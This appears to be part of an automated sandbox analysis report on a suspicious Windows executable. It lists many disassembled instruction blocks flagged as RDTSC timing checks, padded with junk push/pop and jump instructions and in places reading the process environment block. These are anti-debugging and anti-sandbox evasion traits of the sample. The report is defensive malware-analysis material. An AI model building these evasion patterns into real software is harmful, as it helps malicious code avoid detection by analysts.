    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA3DE second address: ADA3FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FB418E0AE86h 0x0000000e ja 00007FB418E0AE76h 0x00000014 jmp 00007FB418E0AE7Ah 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA56D second address: ADA57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jns 00007FB418AEFE46h 0x0000000c pop edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA720 second address: ADA724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA724 second address: ADA74F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FB418AEFE4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA898 second address: ADA89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADAB23 second address: ADAB41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB418AEFE51h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADAB41 second address: ADAB61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB418E0AE85h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADAB61 second address: ADAB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE0480 second address: AE04AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB418E0AE7Eh 0x0000000d jmp 00007FB418E0AE87h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE0655 second address: AE0659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE0659 second address: AE0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A37 second address: AE3A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A3D second address: AE3A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB418E0AE7Fh 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A55 second address: AE3A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A5B second address: AE3A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A61 second address: AE3A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE3A6A second address: AE3A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE621D second address: AE622C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE622C second address: AE623E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jnc 00007FB418E0AE76h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AE623E second address: AE6250 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB418AEFE46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C027E4 second address: C027EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C027EF second address: C02811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FB418AEFE46h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02811 second address: C0281F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C014C0 second address: C014F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE53h 0x00000007 jmp 00007FB418AEFE4Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB418AEFE52h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C014F9 second address: C014FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01811 second address: C01817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01817 second address: C0181B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0181B second address: C0183B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007FB418AEFE46h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0183B second address: C0186B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FB418E0AE80h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0186B second address: C01871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01871 second address: C01875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C019F0 second address: C019FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C019FF second address: C01A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE85h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C01EB3 second address: C01ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418AEFE54h 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02052 second address: C02058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02058 second address: C0205E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02322 second address: C02326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024D0 second address: C024E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB418AEFE46h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024E0 second address: C024EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418E0AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024EA second address: C024FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FB418AEFE46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C024FA second address: C02532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB418E0AE82h 0x0000000c jc 00007FB418E0AE76h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007FB418E0AE82h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C02532 second address: C02549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0402C second address: C0403D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0403D second address: C04041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C04041 second address: C04045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C04045 second address: C0404E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C03EC2 second address: C03ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C06E23 second address: C06E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09727 second address: C0972B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0972B second address: C09742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09AE0 second address: C09AE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09AE6 second address: C09B3A instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE4Ch 0x00000008 jns 00007FB418AEFE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jbe 00007FB418AEFE46h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c pop edx 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jmp 00007FB418AEFE4Fh 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FB418AEFE58h 0x00000030 jp 00007FB418AEFE46h 0x00000036 popad 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09B3A second address: C09B65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB418E0AE83h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007FB418E0AE88h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FB418E0AE76h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C09B65 second address: C09B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B3C1 second address: C0B3E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FB418E0AE86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B3E7 second address: C0B40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Fh 0x00000009 jmp 00007FB418AEFE53h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B40D second address: C0B423 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418E0AE76h 0x00000008 js 00007FB418E0AE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0B423 second address: C0B427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0D58C second address: C0D599 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: C0D599 second address: C0D5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0002C second address: 6F0007C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB418E0AE7Eh 0x0000000f push eax 0x00000010 jmp 00007FB418E0AE7Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB418E0AE85h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0007C second address: 6F000D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418AEFE57h 0x00000009 add eax, 626FEBBEh 0x0000000f jmp 00007FB418AEFE59h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a jmp 00007FB418AEFE4Dh 0x0000001f mov eax, dword ptr fs:[00000030h] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx esi, bx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F001C7 second address: 6F001CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F001CD second address: 6F0024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB418AEFE52h 0x00000014 or ch, FFFFFFE8h 0x00000017 jmp 00007FB418AEFE4Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FB418AEFE58h 0x00000023 sbb si, 7148h 0x00000028 jmp 00007FB418AEFE4Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov si, 40BFh 0x00000033 popad 0x00000034 mov esi, dword ptr [756006ECh] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0024B second address: 6F0024F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0024F second address: 6F00266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00266 second address: 6F002A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB418E0AE7Bh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e jmp 00007FB418E0AE7Fh 0x00000013 jne 00007FB418E0BCFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB418E0AE85h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F002A6 second address: 6F002F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418AEFE57h 0x00000009 sbb ax, 0BAEh 0x0000000e jmp 00007FB418AEFE59h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e movsx edi, ax 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F002F4 second address: 6F002F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F002F9 second address: 6F00364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FB418AEFE50h 0x0000000f call dword ptr [755D0B60h] 0x00000015 mov eax, 7696E5E0h 0x0000001a ret 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB418AEFE4Eh 0x00000022 add eax, 636E31E8h 0x00000028 jmp 00007FB418AEFE4Bh 0x0000002d popfd 0x0000002e mov si, F5DFh 0x00000032 popad 0x00000033 push 00000044h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB418AEFE51h 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00364 second address: 6F00391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB418E0AE83h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00391 second address: 6F003E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB418AEFE4Eh 0x00000011 xor si, B438h 0x00000016 jmp 00007FB418AEFE4Bh 0x0000001b popfd 0x0000001c mov dl, cl 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FB418AEFE51h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F003E2 second address: 6F003F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4C4CB6AEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F003F4 second address: 6F003F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F003F8 second address: 6F00406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00406 second address: 6F0042A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx ebx, cx 0x00000011 jmp 00007FB418AEFE4Ch 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0042A second address: 6F00430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00430 second address: 6F00472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB418AEFE4Fh 0x00000015 and si, 621Eh 0x0000001a jmp 00007FB418AEFE59h 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 mov dh, cl 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00472 second address: 6F00476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00476 second address: 6F00494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [eax+18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418AEFE52h 0x00000011 rdtsc
